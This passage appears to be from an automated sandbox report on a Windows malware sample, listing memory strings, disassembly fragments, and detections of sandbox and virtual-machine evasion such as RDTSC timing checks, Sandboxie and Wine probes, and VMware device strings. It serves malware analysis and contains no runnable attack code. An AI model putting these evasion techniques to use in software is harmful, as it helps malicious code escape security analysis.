          Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeCode function: 1_2_00E3612B push es; retn 0000h
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeCode function: 1_2_00E38A39 push cs; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00416997 push 00000053h; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00417A42 push edi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0040E2B6 pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041D4F2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041D4FB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041D4A5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0041D55C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00417658 push esi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F4D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AB6997 push 00000053h; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AAE2B6 pushfd ; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AB7A42 push edi; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABD4A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABD4FB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABD4F2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00ABD55C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_00AB7658 push esi; ret
          Source: C:\Windows\explorer.exeCode function: 30_2_0595C9B5 push esp; retn 0000h
          Source: C:\Windows\explorer.exeCode function: 30_2_0595CB1E push esp; retn 0000h
          Source: C:\Windows\explorer.exeCode function: 30_2_0595CB02 push esp; retn 0000h
          Source: C:\Windows\explorer.exeCode function: 42_2_05569B1E push esp; retn 0000h
          Source: C:\Windows\explorer.exeCode function: 42_2_05569B02 push esp; retn 0000h
          Source: C:\Windows\explorer.exeCode function: 42_2_055699B5 push esp; retn 0000h
          Source: initial sampleStatic PE information: section name: .text entropy: 7.91694602687
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: H4vBtZsi8xAKaMm.exe PID: 6364, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000AA9904 second address: 0000000000AA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000AA9B6E second address: 0000000000AA9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe TID: 6476Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.6 %
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000F.00000000.386697786.0000000008C73000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000F.00000000.352237691.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000001E.00000003.560476298.000000000AA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:-0330-11EB-90E6-ECF4BB82F7E0}
          Source: explorer.exe, 0000000F.00000000.386974871.0000000008DB8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 0000001E.00000002.606719238.000000000AAF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000003.569107204.000000000D827000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000001E.00000002.604249591.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
          Source: explorer.exe, 0000001E.00000002.603447661.00000000053DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000000.386085770.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000001E.00000002.604249591.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}57
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BlnAO
          Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000002.612089074.000000000D80B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000001E.00000003.546950960.000000000A983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000001E.00000003.565863897.000000000D815000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000001E.00000003.565863897.000000000D815000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000u@v
          Source: explorer.exe, 0000001E.00000002.607598476.000000000ABDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00\
          Source: explorer.exe, 0000001E.00000003.585529071.000000000DDE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\luc6-96e00#{6b2-8bAGe62-80}#4063d0c9?\luc6-96e00#{6b2-8bAGe62-80}#1063d0c9\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bd
          Source: explorer.exe, 0000000F.00000000.388195555.000000000EE0C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
